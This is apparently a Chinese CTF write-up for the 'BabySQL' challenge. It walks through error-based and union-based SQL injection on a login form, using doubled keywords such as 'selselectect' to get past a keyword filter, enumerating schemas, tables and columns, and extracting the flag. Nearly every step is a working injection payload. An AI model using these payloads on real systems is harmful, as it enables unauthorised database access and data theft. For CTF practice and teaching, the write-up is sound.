[极客大挑战 2019]BabySQL 1

#做题方法#

进去之后做了简单的注入发现有错误回显，就进行注入发现过滤了sql语

后面进行了双写and

payload：

?username=admin%27%20aandnd%20updatexml(1,concat(0x7e,dAtabase(),0x7e,version()),1)%20--+&password=admi

 

接下来又

?username=admin%27%20aandnd%20updatexml(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27geek%27)),1)%20--+&password=admi

Error!

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'infmation_schema.tables table_schema='geek')),1) -- ' and password='admi'' at line 1

过滤select和from和where这种关键性的sql语

p?username=admin%27%20aandnd%20updatexml(1,concat(0x7e,(selselectect%20group_concat(table_name)%20frfromom%20information_schema.tables%20whwhereere%20table_schema=datAbase())),1)%20--+&password=admin

过滤了or加上多加个or

?username=admin%27%20aandnd%20updatexml(1,concat(0x7e,(selselectect%20group_concat(table_name)%20frfromom%20infoorrmation_schema.tables%20whwhereere%20table_schema=datAbase())),1)%20--+&password=admin

感觉不在这个库里面原因：做过之前题好像是在ctf库里的

于是重新爆库名

p?username=admin%27%20aandnd%20updatexml(1,concat(0x7e,(selselectect%20group_concat(schema_name)%20frfromom%20infoorrmation_schema.schemata)),1)%20--+&password=admi

ok!可以但是只能显示部分！

于是：加mid

username=admin%27%20aandnd%20updatexml(1,concat(0x7e,mid((selselectect%20group_concat(schema_name)%20frfromom%20infoorrmation_schema.schemata),30,31)),1)%20--+&password=admin

肯定是mid过滤了

?username=admin%27%20aandnd%20updatexml(1,concat(0x7e,mmidid((selselectect%20group_concat(schema_name)%20frfromom%20infoorrmation_schema.schemata),30,31)),1)%20--+&password=admi

好了在ctf里

admin%27%20aandnd%20updatexml(1,concat(0x7e,(selselectect%20group_concat(table_name)%20frfromom%20infoorrmation_schema.tables%20whwhereere%20table_schema='ctf')),1)%20--+&password=admin

username=admin%27%20aandnd%20updatexml(1,concat(0x7e,(selselectect%20group_concat(column_name)%20frfromom%20infoorrmation_schema.columns%20whwhereere%20table_name=%27Flag%27)),1)%20--+&password=admin

还是flag于是

username=admin%27%20aandnd%20updatexml(1,concat(0x7e,(selselectect%20group_concat(flag)%20frfromom%20ctf.Flag)),1)%20--+&password=admin

flag{146e0e64-3add-4fab-aa69-bb

username=admin%27%20aandnd%20updatexml(1,concat(0x7e,mmidid((selselectect%20group_concat(flag)%20frfromom%20ctf.Flag),30,31)),1)%20--+&password=admin

错误注入是出来32位回显的，我们使用的是30，31）所以把前面bb去掉组合在一起就行了

~bb34cf3e6b1b}

flag{146e0e64-3add-4fab-aa69-bb34cf3e6b1b}

最后我试了一下union也可以出来，也是双写

username=1%27%20ununionion%20selselectect%201,2,group_concat(flag)%20frfromom%20ctf.Flag%20--+&password=admin